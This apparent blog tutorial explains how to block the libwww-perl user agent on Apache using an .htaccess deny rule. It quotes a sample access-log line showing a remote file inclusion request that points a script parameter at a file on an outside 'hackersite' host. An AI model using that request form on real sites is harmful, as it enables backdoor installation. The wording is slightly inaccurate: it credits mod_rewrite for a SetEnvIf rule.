How to block libwww-perl access in Apache webserver to keep away bots,spammers,crackers?

The world of hackers, crackers, bots and spammers are keep growing and it has become serious threat to many websites. libwww-perl (LWP) is a WWW client/server library for Perl and it can help many hackers, spammers and bots to perform attacks on your site. For e.g; Just head on to your web server access log and run the below command.

$ grep ‘libwww-perl’ access_log

Do you see something similar to the below output?

190.85.10.147 www.domain.com - [21/Aug/2013:21:22:38 +0000] "GET /webdir/yesno.phtml?no_url=http://www.hackersite.com/list1.txt? HTTP/1.1" 200 72672 "-" "libwww-perl/5.76"

It means, some hacker is trying to use the security hole and install a backdoor pages. So libwww-perl useragent have to be blocked to prevent any such attacks on your website.

How to verify whether libwww-perl useragent is blocked on your server?

Step 1: Download this simple perl script and rename it as ‘test-lwp.pl’.

Step 2: Edit ‘test-lwp.pl’ file and replace http://your-website.com/ with your website name.

Step 3: Give executable permission to the script

chmod +x test-lwp.pl

Step 4 : Run the perl script as below,

./test-lwp.pl

Step 4 should display “Error : 403 Forbidden“. If it does not, then your website might be prone for libwww-perl useragent attack.

How to deny libwww-perl attack using .htaccess?

Using mod_rewrite and .htaccess file, we can block user agent libwww-perl. Edit your .htaccess file and add rule as follows:

SetEnvIfNoCase User-Agent "^libwww-perl*" block_bad_bots
Deny from env=block_bad_bots

Now execute test-lwp.pl file and you should see “Error : 403 Forbidden”. That’s it!